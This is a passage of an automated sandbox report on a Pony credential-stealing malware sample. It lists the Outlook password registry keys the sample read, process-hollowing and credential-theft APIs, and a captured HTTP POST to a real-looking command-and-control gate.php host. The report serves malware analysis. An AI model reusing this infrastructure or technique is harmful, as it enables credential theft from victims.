HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\IMAP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Email Address
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP Server URL
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail User Name
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail Server
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP User
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTPMail Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Password2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\NNTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\HTTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Password
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\SMTP Port
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\IMAP Port
HKEY_CURRENT_USER\Software\WinRAR\Client Hash
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3512230a-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122306-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{35122307-fb0b-11e5-b945-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun

Write Keys

HKEY_CURRENT_USER\Software\WinRAR
HKEY_CURRENT_USER\Software\WinRAR\HWID

Delete Keys

Nothing to display

Mutexes

Local\_!MSFTHISTORY!_
Local\c:!users!seven01!appdata!local!microsoft!windows!temporary internet files!content.ie5!
Local\c:!users!seven01!appdata!roaming!microsoft!windows!cookies!
Local\c:!users!seven01!appdata!local!microsoft!windows!history!history.ie5!

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.GetNativeSystemInfo
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.LocaleNameToLCID
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.GetTempPathW
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
kernel32.dll.GetFullPathNameW
cryptsp.dll.CryptGetDefaultProviderW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.SetThreadErrorMode
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.WriteFile
kernel32.dll.GetFileAttributesExW
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.GetStdHandle
kernel32.dll.GetEnvironmentStrings
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.CreateProcessW
kernel32.dll.DuplicateHandle
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.DeleteFileW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.FindResourceA
kernel32.dll.SizeofResource
kernel32.dll.LoadResource
kernel32.dll.LockResource
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipCreateBitmapFromStream
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
kernel32.dll.ReleaseMutex
kernel32.dll.CreateMutexW
shell32.dll.SHGetFolderPathW
kernel32.dll.CopyFileW
kernel32.dll.DeleteFileA
kernel32.dll.WideCharToMultiByte
kernel32.dll.CompareStringOrdinal
clr.dll.CreateAssemblyNameObject
ole32.dll.CoGetObjectContext
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
clr.dll.CreateAssemblyEnum
kernel32.dll.ResolveLocaleName
kernel32.dll.LoadLibraryA
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
ntdll.dll.NtQuerySystemInformation
kernel32.dll.CreateProcessA
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.WriteProcessMemory
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.VirtualAllocEx
kernel32.dll.ResumeThread
ole32.dll.CoUninitialize
oleaut32.dll.#500
advapi32.dll.EventUnregister
gdiplus.dll.GdipDisposeImage
cryptsp.dll.CryptReleaseContext
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
kernel32.dll.GetProcessPreferredUILanguages
kernel32.dll.GetUserDefaultUILanguage
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
version.dll.VerQueryValueA
alink.dll.CreateALink
mscoree.dll.CLRCreateInstance
mscoreei.dll.CLRCreateInstance
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
clr.dll.DllGetClassObjectInternal
clr.dll.StrongNameTokenFromPublicKey
clr.dll.StrongNameFreeBuffer
clr.dll.CompareAssemblyIdentityWithConfig
clr.dll.CreateAssemblyConfigCookie
clr.dll.DestroyAssemblyConfigCookie
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
mscorpehost.dll.InitializeSxS
mscorpehost.dll.CreateICeeFileGen
mscorpehost.dll.DestroyICeeFileGen
ole32.dll.CoCreateGuid
diasymreader.dll.DllGetClassObject
rpcrt4.dll.UuidCreate
kernel32.dll.NlsGetCacheUpdateCount
ole32.dll.CreateStreamOnHGlobal
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess
kernel32.dll.CreateFileA
kernel32.dll.lstrlenA
kernel32.dll.GlobalLock
kernel32.dll.GlobalUnlock
kernel32.dll.LocalFree
kernel32.dll.LocalAlloc
kernel32.dll.GetTickCount
kernel32.dll.lstrcpyA
kernel32.dll.lstrcatA
kernel32.dll.GetFileAttributesA
kernel32.dll.ExpandEnvironmentStringsA
kernel32.dll.CreateFileMappingA
kernel32.dll.MapViewOfFile
kernel32.dll.GetTempPathA
kernel32.dll.CreateDirectoryA
kernel32.dll.GetLastError
kernel32.dll.lstrcmpA
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Process32First
kernel32.dll.OpenProcess
kernel32.dll.Process32Next
kernel32.dll.FindFirstFileA
kernel32.dll.lstrcmpiA
kernel32.dll.FindNextFileA
kernel32.dll.FindClose
kernel32.dll.GetVersionExA
kernel32.dll.GetLocaleInfoA
kernel32.dll.GetSystemInfo
kernel32.dll.GetWindowsDirectoryA
kernel32.dll.GetPrivateProfileStringA
kernel32.dll.SetCurrentDirectoryA
kernel32.dll.GetPrivateProfileSectionNamesA
kernel32.dll.GetPrivateProfileIntA
kernel32.dll.GetCurrentDirectoryA
kernel32.dll.lstrlenW
kernel32.dll.MultiByteToWideChar
kernel32.dll.Sleep
kernel32.dll.GetModuleFileNameA
kernel32.dll.LCMapStringA
kernel32.dll.ExitProcess
kernel32.dll.SetUnhandledExceptionFilter
advapi32.dll.RegOpenKeyExA
advapi32.dll.RegQueryValueExA
advapi32.dll.RegOpenKeyA
advapi32.dll.RegEnumKeyExA
advapi32.dll.RegCreateKeyA
advapi32.dll.RegSetValueExA
advapi32.dll.IsTextUnicode
advapi32.dll.RegOpenCurrentUser
advapi32.dll.RegEnumValueA
advapi32.dll.GetUserNameA
ole32.dll.GetHGlobalFromStream
ole32.dll.OleInitialize
shlwapi.dll.StrStrIA
shlwapi.dll.StrRChrIA
shlwapi.dll.StrToIntA
shlwapi.dll.StrStrA
shlwapi.dll.StrCmpNIA
shlwapi.dll.StrStrIW
urlmon.dll.ObtainUserAgentString
user32.dll.wsprintfA
userenv.dll.LoadUserProfileA
userenv.dll.UnloadUserProfile
wininet.dll.InternetCrackUrlA
wininet.dll.InternetCreateUrlA
wsock32.dll.inet_addr
wsock32.dll.gethostbyname
wsock32.dll.socket
wsock32.dll.connect
wsock32.dll.closesocket
wsock32.dll.send
wsock32.dll.select
wsock32.dll.recv
wsock32.dll.setsockopt
wsock32.dll.WSAStartup
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
ole32.dll.StgOpenStorage
crypt32.dll.CryptUnprotectData
crypt32.dll.CertOpenSystemStoreA
crypt32.dll.CertEnumCertificatesInStore
crypt32.dll.CertCloseStore
crypt32.dll.CryptAcquireCertificatePrivateKey
advapi32.dll.CheckTokenMembership
advapi32.dll.CredEnumerateA
advapi32.dll.CredFree
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptReleaseContext
advapi32.dll.RevertToSelf
advapi32.dll.ImpersonateLoggedOnUser
advapi32.dll.ConvertSidToStringSidA
advapi32.dll.LogonUserA
advapi32.dll.LookupPrivilegeValueA
advapi32.dll.CreateProcessAsUserA
shell32.dll.SHGetFolderPathA
netapi32.dll.NetApiBufferFree
netapi32.dll.NetUserEnum
kernel32.dll.WTSGetActiveConsoleSessionId
kernel32.dll.ProcessIdToSessionId
msi.dll.MsiGetComponentPathA
pstorec.dll.PStoreCreateInstance
userenv.dll.CreateEnvironmentBlock
userenv.dll.DestroyEnvironmentBlock
kernel32.dll.IsWow64Process
mlang.dll.#112
wininet.dll.FindFirstUrlCacheEntryA
kernel32.dll.SetFileInformationByHandle
urlmon.dll.CreateUri
kernel32.dll.InitializeSRWLock
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.AcquireSRWLockShared
kernel32.dll.ReleaseSRWLockExclusive
kernel32.dll.ReleaseSRWLockShared
wininet.dll.FindNextUrlCacheEntryA
wininet.dll.FindCloseUrlCache
userenv.dll.GetUserProfileDirectoryW
sechost.dll.ConvertSidToStringSidW
samlib.dll.SamConnect
rpcrt4.dll.NdrClientCall2
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcStringFreeW
rpcrt4.dll.RpcBindingFree
samlib.dll.SamGetCompatibilityMode
samlib.dll.SamOpenDomain
samlib.dll.SamEnumerateDomainsInSamServer
samlib.dll.SamLookupDomainInSamServer
samlib.dll.SamFreeMemory
samlib.dll.SamEnumerateUsersInDomain
samlib.dll.SamOpenUser
samlib.dll.SamQueryInformationUser
samlib.dll.SamQuerySecurityObject
samlib.dll.SamGetGroupsForUser
samlib.dll.SamRidToSid
samlib.dll.SamGetAliasMembership
samlib.dll.SamCloseHandle
sspicli.dll.LogonUserExExW
shell32.dll.ShellExecuteA
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#386
advapi32.dll.UnregisterTraceGuids
comctl32.dll.#321
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel

Execute Commands

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\hru5mklf.cmdline"
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RES4E93.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSCF76FE7C21302401AB124AE595F9F7E1A.TMP"
C:\Users\Seven01\AppData\Local\Temp\14623046.bat "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04_64 Seven04_64 VirtualBox 2018-09-17 22:20:21 2018-09-17 22:23:24 183

1 HTTP Request(s) detected

http://goodlogingss.nut.cc/wp-content/Pony/panel/gate.php
  • Hostname: goodlogingss.nut.cc
  • IP Address: 185.223.163.52
  • Port: 80
  • Count: 3

POST /wp-content/Pony/panel/gate.php HTTP/1.0
Host: goodlogingss.nut.cc
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 188
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

Detected family: #Pony

TheSystem Itself @ 2018-09-17 22:30:03